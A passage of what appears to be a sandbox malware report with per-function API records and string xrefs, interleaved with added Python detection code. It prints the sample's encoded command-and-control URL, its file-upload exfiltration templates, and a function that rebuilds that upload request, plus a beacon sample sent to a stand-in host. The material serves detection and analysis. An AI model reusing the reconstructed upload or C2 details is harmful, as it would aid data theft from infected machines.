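    return len(score_request(raw)) >= threshold


# Constructed samples: the beacon uses the template literals from the report
# with an assumed host, path and body; the benign request is ordinary traffic.
BEACON_SAMPLE = (
    b"POST /gate.php HTTP/1.0\r\n"
    b"Host: c2.example\r\n"
    b"User-Agent: " + BEACON_UA.encode() + b"\r\n"
    b"Content-type: application/x-www-form-urlencoded\r\n"
    b"Cookie: " + BEACON_COOKIE.encode() + b"\r\n"
    b"Content-length: 22\r\n"
    b"\r\n"
    b"_wv=ff&user&host&1&0&7"
)
BENIGN_SAMPLE = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) "
    b"Gecko/20100101 Firefox/115.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Cookie: session=abc\r\n"
    b"Content-Length: 13\r\n"
    b"\r\n"
    b"user=a&pass=b"
)

if __name__ == "__main__":
    for label, sample in (("beacon", BEACON_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, is_beacon(sample), score_request(sample))
```

The threshold keeps a single weak indicator (HTTP/1.0, or one odd header spelling) from firing on its own; the fixed cookie value and the exact user agent are the strong ones and would also translate directly into a Suricata content match or a YARA string on the unpacked image.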
APIs
  • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
  • Part of subcall function 0040684A: strlen.MSVCRT ref: 00406854
  • Part of subcall function 0040684A: StrCmpNA.SHLWAPI(?,POST,00000000), ref: 00406860
• StrStrIA.SHLWAPI(00000000,), ref: 00406BDB
• strlen.MSVCRT ref: 00406C12
• CreateThread.KERNEL32(00000000,00000000,0040A13C,00000000,00000000,00000000), ref: 00406C7D
• WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00406C86
• CreateThread.KERNEL32(00000000,00000000,0040A13C,00000000,00000000,00000000), ref: 00406CE7
• WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00406CF0
Strings
Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateObjectSingleThreadWaitstrlen$AllocVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2591684496-2344752452
                                                                                                                                                                                                                                                                                            • Opcode ID: 4134e3e3e27c11381cc6432724dd2b74fe9533b3ff24f782e92f8c78223b0c8f
                                                                                                                                                                                                                                                                                            • Instruction ID: 808541e188ed4cd89f6ec13a161f957f63ed6102ad404da529229d2523cbe5da
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4134e3e3e27c11381cc6432724dd2b74fe9533b3ff24f782e92f8c78223b0c8f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B41D8B2900215AFDB107FB59C8995EB7A8AF44318B06813BFA05B7281D6799D20C798
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=, xrefs: 00402D58
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: toupper
                                                                                                                                                                                                                                                                                            • String ID: aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=
                                                                                                                                                                                                                                                                                            • API String ID: 3566517832-1689639315
                                                                                                                                                                                                                                                                                            • Opcode ID: 802625297930aff3560f26b9a70184b5b480969580bf75b6449719d799e32ffe
                                                                                                                                                                                                                                                                                            • Instruction ID: a48f569b21719a1f86f71e86e4a7c331d02e31fd6c7badc472a8797e518b5431
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 802625297930aff3560f26b9a70184b5b480969580bf75b6449719d799e32ffe
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44219270E042699FCF00DBF899D85AEBFF8AF09251B1005BBD401E7281E6788E41CB94
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004064D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00407DFB,000000FF,00000000,00000000,00000000,00000000,753C73E0,00000206,00000000,?,?,00407DFB,?), ref: 004064E9
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040887B: strstr.MSVCRT ref: 004088C0
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040887B: strstr.MSVCRT ref: 004088D4
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040887B: strstr.MSVCRT ref: 004088EB
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040887B: strstr.MSVCRT ref: 004088F6
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040887B: strstr.MSVCRT ref: 00408903
                                                                                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 00408C44
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00408C80
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00408C95
                                                                                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 00408CF8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • POST %s HTTP/1.0Host: %sCookie: auth=bc00595440e801f8a5d2a2ad13b9791b;uid=%lsUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-Type: multipart/form-data; boundary=---------------------------%dContent-Length: , xrefs: 00408CF2
                                                                                                                                                                                                                                                                                            • -----------------------------%dContent-Disposition: form-data;name="fname"%ls-----------------------------%dContent-Disposition: form-data; name="data"; filename="%ls"Content-Type: application/octet-stream, xrefs: 00408C7A
                                                                                                                                                                                                                                                                                            • -----------------------------%d, xrefs: 00408C3E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: strstr$sprintf$ByteCharMultiSleepWidewsprintf
                                                                                                                                                                                                                                                                                            • String ID: -----------------------------%d$-----------------------------%dContent-Disposition: form-data;name="fname"%ls-----------------------------%dContent-Disposition: form-data; name="data"; filename="%ls"Content-Type: application/octet-stream$POST %s HTTP/1.0Host: %sCookie: auth=bc00595440e801f8a5d2a2ad13b9791b;uid=%lsUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-Type: multipart/form-data; boundary=---------------------------%dContent-Length:
                                                                                                                                                                                                                                                                                            • API String ID: 1631555295-2459763480
                                                                                                                                                                                                                                                                                            • Opcode ID: bad85a6fd40427c1e6478a6947043c0355f1b39d6532cdeb3166bcddc944f8ad
                                                                                                                                                                                                                                                                                            • Instruction ID: ad8ec8c98f77bd44cec04117c3abe5ee4421dba4810e898ccc20856f11a99f70
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bad85a6fd40427c1e6478a6947043c0355f1b39d6532cdeb3166bcddc944f8ad
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB51F3B2C00208BBDF11ABE5DD469EF7BB8EF84314F15013EF950B61C1EA3959558B68
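The two function records above carry the sample's task URL (stored base64-encoded, xref 00402D58) and the three sprintf/wsprintfA templates it fills to upload a file (xrefs 00408C3E, 00408C7A, 00408CF2). The Python below is an added triage example, not code from the report or from the sample. It scans arbitrary dump bytes for base64 tokens that decode to URLs (generalising the single string on the page), renders the upload request the templates describe, and flags three indicators that are visible in those templates: the fixed Cookie value auth=bc00595440e801f8a5d2a2ad13b9791b, the User-Agent whose rv:39.0 does not match its Firefox/38.0, and a multipart upload sent as HTTP/1.0. The following are assumptions and are marked as such in the code: CRLF header separators (the report's string extraction dropped line endings), a 27-dash Firefox-style boundary with the body delimiter two dashes longer, a closing delimiter after the file bytes, and the host, path, uid and file name, which are placeholders supplied by the caller.

```python
import base64
import binascii
import re

# Base64 string recovered from the memory dump (xref 00402D58 in the record above).
ENCODED_TASK_URL = "aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA="

# Fixed cookie value and User-Agent from the POST template (xref 00408CF2).
# The User-Agent claims rv:39.0 but Firefox/38.0; a real Firefox 38 sends rv:38.0.
HARDCODED_AUTH = "auth=bc00595440e801f8a5d2a2ad13b9791b"
TEMPLATE_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) "
               "Gecko/20100101 Firefox/38.0")

_B64_TOKEN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
_RV = re.compile(r"rv:(\d+)")
_FF = re.compile(r"Firefox/(\d+)")


def decode_b64(token):
    """Decode one base64 token (bytes); return None if it is not valid base64."""
    try:
        return base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None


def find_b64_urls(blob):
    """Scan raw bytes (e.g. strings pulled from a memory dump) for base64
    tokens that decode to an http(s) URL. Generalises the one xref on the page."""
    hits = []
    for m in _B64_TOKEN.finditer(blob):
        decoded = decode_b64(m.group(0))
        if decoded and decoded.startswith((b"http://", b"https://")):
            try:
                hits.append(decoded.decode("ascii"))
            except UnicodeDecodeError:
                continue
    return hits


def build_upload_request(host, path, uid, fname, data, boundary_num):
    """Render the multipart upload the report's three format strings describe.
    Assumptions: CRLF separators (dropped by the report's string extraction),
    a 27-dash boundary as Firefox uses it, and a closing delimiter after the
    file bytes (the page's template ends at the octet-stream Content-Type)."""
    boundary = "-" * 27 + str(boundary_num)   # value in the Content-Type header
    delim = "--" + boundary                    # 29-dash form used in the body
    body = (
        f"{delim}\r\n"
        f'Content-Disposition: form-data; name="fname"\r\n\r\n{fname}\r\n'
        f"{delim}\r\n"
        f'Content-Disposition: form-data; name="data"; filename="{fname}"\r\n'
        f"Content-Type: application/octet-stream\r\n\r\n"
    ).encode() + data + f"\r\n{delim}--\r\n".encode()
    head = (
        f"POST {path} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {HARDCODED_AUTH};uid={uid}\r\n"
        f"User-Agent: {TEMPLATE_UA}\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode()
    return head + body


def parse_headers(raw):
    """Split a raw request into (request line, {lower-cased header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def triage_request(raw):
    """Return the names of the indicators that fire on one raw HTTP request."""
    request_line, headers = parse_headers(raw)
    hits = []
    if HARDCODED_AUTH in headers.get("cookie", ""):
        hits.append("hardcoded-auth-cookie")
    ua = headers.get("user-agent", "")
    rv, ff = _RV.search(ua), _FF.search(ua)
    if rv and ff and rv.group(1) != ff.group(1):
        hits.append("ua-version-mismatch")
    if (request_line.endswith("HTTP/1.0")
            and headers.get("content-type", "").startswith("multipart/form-data")):
        hits.append("http10-multipart-upload")
    return hits


if __name__ == "__main__":
    print(find_b64_urls(ENCODED_TASK_URL.encode()))
    # Placeholder host/path/uid/file name; file bytes are constructed.
    req = build_upload_request("example.invalid", "/n/tasks.php", "uid0",
                               "settings3.bin", b"\x00\x01\x02", 12345)
    print(triage_request(req))
```

The User-Agent check is the cheapest of the three to deploy as a network rule (a Firefox build whose rv: and Firefox/ versions disagree is not a browser), and the fixed cookie value can go straight into a Suricata content match alongside the alerts this report already lists.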
APIs
  • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
  • Part of subcall function 0040A1D2: GetModuleHandleW.KERNEL32(ntdll.dll,?,00001B7C,00000000,?,004095E8,?,?), ref: 0040A1EB
• _endthreadex.MSVCRT(00000000), ref: 00409707
  • Part of subcall function 00404C17: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
  • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
  • Part of subcall function 004046F2: memset.MSVCRT ref: 0040470B
• _beginthreadex.MSVCRT ref: 00409683
  • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: AllocVirtual$HandleLibraryLoadModule_beginthreadex_endthreadexmemset
• String ID: -nogui$Cn@$\settings.rdp$\settings3.bin
• API String ID: 2388428757-2030277181
• Opcode ID: f08ba4c1bfcddca5860970e3d8ed7492dd9724e3b6700796bcda73e855b6c632
• Instruction ID: 04d713010f84b04d8a14b19830c6c0211c9473c0c386c6472beaf5e9da5b9fb7
• Opcode Fuzzy Hash: f08ba4c1bfcddca5860970e3d8ed7492dd9724e3b6700796bcda73e855b6c632
• Instruction Fuzzy Hash: 5431E6B2804208BEEB007BB2DC46D9E7B68EF44314F11443FF554761C2EBBD596086AD

APIs
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: _wcsicmpwcscat$lstrcatwcscpy
• String ID:
• API String ID: 496261138-0
• Opcode ID: 0ff2d4684aeb4d074380ca8740ff74456deb645bc0d27a3e7455dd289190ab97
• Instruction ID: 35d462b374fbdc36f5f3da2ddc899513784a7a93d8508133af1dc08075530e9b
• Opcode Fuzzy Hash: 0ff2d4684aeb4d074380ca8740ff74456deb645bc0d27a3e7455dd289190ab97
• Instruction Fuzzy Hash: 59318532500209EFDB14AF64DD899AB77B8EF44354F10447EF885F61D0EB389952DB98

APIs
• strlen.MSVCRT ref: 0040499A
• StrCmpNA.SHLWAPI(?,POST,00000000), ref: 004049A6
                                                                                                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,content-length: ), ref: 004049BE
                                                                                                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,Host: ), ref: 004049CC
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: strlen
                                                                                                                                                                                                                                                                                            • String ID: Host: $POST$content-length:
                                                                                                                                                                                                                                                                                            • API String ID: 39653677-1042216372
                                                                                                                                                                                                                                                                                            • Opcode ID: ddc6d14d3c1df5b068e88612f82facdd4d0dcb2df7500a7662d94c7f20301dab
                                                                                                                                                                                                                                                                                            • Instruction ID: d5a4c767ce580ea6c1601e266662ee61187f5ff5f5cbd4b0533a35ef7b913b7b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddc6d14d3c1df5b068e88612f82facdd4d0dcb2df7500a7662d94c7f20301dab
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADE09272101129FBCF001F61DD459AB3F5DDE417A03054173BD08B60A1DB799C215BEC
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5844bf0b42851f5fe1c49cb1bc07bb877bcec552a78b92d61f8084f892e9533e
                                                                                                                                                                                                                                                                                            • Instruction ID: 66561430130293e26bb4315b1dc9932d2619224a750b5e19d140c42ffaa40899
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5844bf0b42851f5fe1c49cb1bc07bb877bcec552a78b92d61f8084f892e9533e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F671D271600B01ABDB20EF65CD85A6677E4FF04304B11097EE946BB6C2DB7CE865CB98
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • memcpy.MSVCRT(00403A0B,?,00000400,00000000,00000000,00000000), ref: 00403683
                                                                                                                                                                                                                                                                                            • memmove.MSVCRT(?,?,?), ref: 0040369A
                                                                                                                                                                                                                                                                                            • recv.WS2_32(00000000,?,?,00000000), ref: 004036EF
                                                                                                                                                                                                                                                                                            • memcpy.MSVCRT(00403A0B,?,?), ref: 004037D1
                                                                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?), ref: 00403802
                                                                                                                                                                                                                                                                                            • memmove.MSVCRT(?,?,?), ref: 0040381F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memcpy$memmove$recv
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1228038989-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9fdc5e6779b14a0df1a9da6607dacebbdd634f9f373cc919025bba962f8f083a
                                                                                                                                                                                                                                                                                            • Instruction ID: 4733277ae43c97108f76b87525d05f9215ac1b9e1a64921db7a6efb0c1656be0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fdc5e6779b14a0df1a9da6607dacebbdd634f9f373cc919025bba962f8f083a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23717EB1900604DFCB20DF69C88486EBBF9FF48311B148A3AE106E7790D375AA45CF58
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
                                                                                                                                                                                                                                                                                            • sscanf.MSVCRT ref: 004045B4
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004045D6
                                                                                                                                                                                                                                                                                            • _beginthreadex.MSVCRT ref: 0040461C
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 00404689
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual_beginthreadex_endthreadexmemsetsscanf
                                                                                                                                                                                                                                                                                            • String ID: %[^:]:%d
                                                                                                                                                                                                                                                                                            • API String ID: 2100783065-2596537641
                                                                                                                                                                                                                                                                                            • Opcode ID: d106942efc362f28b20d0a1f4ea3198db88ca4f8ee9609d88d352717e9177508
                                                                                                                                                                                                                                                                                            • Instruction ID: caad7c37abe64e26d345493b623ba54f3f47d27cd44cb584ac9290b12886452c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d106942efc362f28b20d0a1f4ea3198db88ca4f8ee9609d88d352717e9177508
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C831D3B14083006FD711AB70DC459AF77D8EBC9318F000A3EF5D4B61C2E77D9A0986AA
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0040A2D7
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,sprintf), ref: 0040A2EE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • sprintf, xrefs: 0040A2E8
                                                                                                                                                                                                                                                                                            • GET %s HTTP/1.0Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Host: %sConnection: Close, xrefs: 0040A35D
                                                                                                                                                                                                                                                                                            • ntdll.dll, xrefs: 0040A2D2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                            • String ID: GET %s HTTP/1.0Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Host: %sConnection: Close$ntdll.dll$sprintf
                                                                                                                                                                                                                                                                                            • API String ID: 1646373207-4199336446
                                                                                                                                                                                                                                                                                            • Opcode ID: 6720225d473a3e7a8ee91ae3df4023a30a0bfe42256af2c2cb6c7d85ffd16130
                                                                                                                                                                                                                                                                                            • Instruction ID: 5706cbf925bcad4f2458c19b8b1a726a5bc2f2d2b8a8cdd233c6fc7e23382b0f
• Opcode Fuzzy Hash: 6720225d473a3e7a8ee91ae3df4023a30a0bfe42256af2c2cb6c7d85ffd16130
• Instruction Fuzzy Hash: C431C171D04308BAEF11ABA5DC86BEF7B789F00355F1040AAF901752C2D77D5A58876A
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,?,00001B7C,00000000,?,004095E8,?,?), ref: 0040A1EB
• GetProcAddress.KERNEL32(00000000,sprintf), ref: 0040A202
Strings
• sprintf, xrefs: 0040A1FC
• GET %s HTTP/1.0Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Host: %sConnection: Close, xrefs: 0040A25E
• ntdll.dll, xrefs: 0040A1DD
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GET %s HTTP/1.0Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Host: %sConnection: Close$ntdll.dll$sprintf
• API String ID: 1646373207-4199336446
• Opcode ID: 27c25b0c12fef8fd976663cf04e7778861f518e198658df327bd3485b55de72b
• Instruction ID: b6be74e1b03e75479ef87858cb4f51a505419649f5c342e01217e15b57cc1ad0
• Opcode Fuzzy Hash: 27c25b0c12fef8fd976663cf04e7778861f518e198658df327bd3485b55de72b
• Instruction Fuzzy Hash: 9831AD71D00308BFDB00AFA5CC859EFBB78EF44354F1040BAF901B6281D7398A498BA9
APIs
• memset.MSVCRT ref: 0040767A
  • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
• CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000028,00000000,00000000,00000044,?), ref: 004076EB
• GetExitCodeProcess.KERNEL32(?,?), ref: 004076FF
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: Process$AllocCodeCreateExitVirtualmemset
• String ID: %s %s$D
• API String ID: 2626342938-228357124
• Opcode ID: 44bfef4738790ae1014216102cee146de85259c7ed07b8a908ffe24cc37b47c9
• Instruction ID: 6b5b47374330eb9bbcb85e4d4971d62087e494d4f52310435c6f5cf2edc44698
• Opcode Fuzzy Hash: 44bfef4738790ae1014216102cee146de85259c7ed07b8a908ffe24cc37b47c9
• Instruction Fuzzy Hash: A721A1B590020CBAEF10ABE8CD85EEF777CAB40788F104536F605B61D1D6799E04876A
APIs
• GetModuleHandleW.KERNEL32(chrome.dll), ref: 00406AFC
• memcmp.MSVCRT(c:\b\build\slave\win\build\src\third_party\boringssl\src\ssl\ssl_lib.c,?,00000047), ref: 00406B5F
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: HandleModulememcmp
• String ID: .rdata$c:\b\build\slave\win\build\src\third_party\boringssl\src\ssl\ssl_lib.c$chrome.dll
• API String ID: 3989855111-1570250894
• Opcode ID: 5e56d06232fbb1c31dc4d683aec6f660aea5883495f16a40cced8092f123dd94
• Instruction ID: 2881bae018a64d072246813a1eeff09cffba2de491337b68aaedce54ad982370
• Opcode Fuzzy Hash: 5e56d06232fbb1c31dc4d683aec6f660aea5883495f16a40cced8092f123dd94
• Instruction Fuzzy Hash: D3315AB0D0025AEBCB10DFD5CA817ADBBB0FF04714F114069D819BB245E734AA55CB98
APIs
• GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00408EF1
• GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00408F18
• wcscmp.MSVCRT ref: 00408F30
• free.MSVCRT ref: 00408F4B
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: EncodersGdipImage$Sizefreewcscmp
• String ID: image/jpeg
• API String ID: 1889944190-3785015651
• Opcode ID: 6d15e256acb539afc9f5a56b8e73055e00082a904beecfb1656cccc4f0301ed5
• Instruction ID: 6bdb5e7b763721adc0850e09ae39b457867aa65e877056b428b3a166b53218b9
• Opcode Fuzzy Hash: 6d15e256acb539afc9f5a56b8e73055e00082a904beecfb1656cccc4f0301ed5
• Instruction Fuzzy Hash: 61116072C04119FBCB11EFA5DE8048EBBB9FF04760B2142ABF951B7191CB759E408B98
APIs
  • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
• wcslen.MSVCRT ref: 0040917C
• wsprintfW.USER32 ref: 0040919A
• memset.MSVCRT ref: 004091AA
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: AllocVirtualmemsetwcslenwsprintf
• String ID: %ls %ls$D
• API String ID: 3399112775-3711497183
• Opcode ID: 64437f8ea30d7b2b895be350631d7234ab4844f8bfdfe3bf62bdf63a45208b5e
• Instruction ID: 0f71edebdb05571a7afb2cc771484d0f1e207efa235fb498652b322763e6f6ab
• Opcode Fuzzy Hash: 64437f8ea30d7b2b895be350631d7234ab4844f8bfdfe3bf62bdf63a45208b5e
• Instruction Fuzzy Hash: 6411A0B1505218BFEF106BB1DD4AEDF7F68DF04399F104026FA04B61C2D6798A108AA8
APIs
• LoadLibraryW.KERNEL32(dnsapi), ref: 00405673
• GetProcAddress.KERNEL32(00000000,DnsFlushResolverCache), ref: 00405689
• FreeLibrary.KERNEL32(00000000), ref: 0040569D
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
